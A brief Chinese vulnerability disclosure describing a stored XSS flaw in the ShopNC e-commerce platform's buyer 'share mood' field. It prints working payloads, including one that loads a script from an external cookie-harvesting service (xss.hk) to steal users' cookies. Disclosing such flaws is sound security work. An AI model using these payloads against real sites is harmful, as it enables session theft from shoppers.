### 简要描述:
shopnc存储型xss漏洞
### 详细说明:
shopnc版本测试http://www.shopnctest.com/c2c/2013/demo/
shopnc用户个人主页处存在存储型XSS,可以获取用户敏感cookie信息。
在买家首页,分享心情处
[<img src="https://images.seebug.org/upload/201404/03173903c99e54933326cd4599d0dcba3d10eff6.jpg" alt="a.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/03173903c99e54933326cd4599d0dcba3d10eff6.jpg)
测试代码为:`"><img src=2 onerror=alert(11)/><scriPt >alert(document.cookie)</scripT>//
cookie收信平台
"><img src=2 onerror=alert(11)/><scriPt src=http://xss.hk/ytcXRW?1396447777>alert(document.cookie)</scripT>/`
如图
[<img src="https://images.seebug.org/upload/201404/031739162c88bf5de752ba0c97b0d105f2ad5e3f.jpg" alt="b.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/031739162c88bf5de752ba0c97b0d105f2ad5e3f.jpg)
### 漏洞证明:
如上描述
暂无评论